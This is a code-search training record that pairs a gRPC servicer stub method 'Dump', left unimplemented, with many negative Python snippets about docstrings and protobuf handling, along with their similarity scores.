"0.5161769", "0.51591885", "0.5157628", "0.5145468", "0.51423216", "0.5138763" ]
0.0
-1
Missing associated documentation comment in .proto file.
def Binary(self, request, context):
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n 
self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n 
self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def __init__(self, proto):\n self.proto = proto", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. 
I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = 
CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6348721", "0.6232983", "0.6227791", "0.6107919", "0.6073252", "0.6056996", "0.60199225", "0.5997295", "0.5973073", "0.59475285", "0.59426475", "0.59348774", "0.59195995", "0.59041727", "0.5899058", "0.5865414", "0.5857725", "0.5836395", "0.57917976", "0.57693964", "0.5765628", "0.5738139", "0.5725729", "0.57218313", "0.57099766", "0.5694849", "0.5634908", "0.5631503", "0.562838", "0.5627863", "0.5609239", "0.55800056", "0.5575202", "0.5568366", "0.5556774", "0.554996", "0.55403715", "0.5535095", "0.55324805", "0.55324376", "0.5515471", "0.551169", "0.5499882", "0.54952186", "0.54851204", "0.547969", "0.54744124", "0.5465293", "0.5460546", "0.5460546", "0.5460546", "0.5452012", "0.54468", "0.542486", "0.54212755", "0.5413558", "0.5397512", "0.53957206", "0.53943235", "0.5388301", "0.5376187", "0.5353345", "0.534334", "0.5337087", "0.5336514", "0.53339815", "0.5328619", "0.53255814", "0.53247285", "0.5322686", "0.5319762", "0.53191066", "0.53140306", "0.53077936", "0.5279659", "0.5267621", "0.5264218", "0.5252085", "0.5219406", "0.5217774", "0.5214222", "0.5213382", "0.52094376", "0.52063346", "0.5204785", "0.5193972", "0.5189197", "0.51867706", "0.5182037", "0.51802737", "0.5177115", "0.5172607", "0.5164527", "0.51625025", "0.51625025", "0.5162299", "0.5160613", "0.5157092", "0.51471317", "0.5142684", "0.51393735" ]
0.0
-1
Missing associated documentation comment in .proto file.
def Dump(self, request, context):
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n 
self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n 
self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def __init__(self, proto):\n self.proto = proto", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. 
I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n 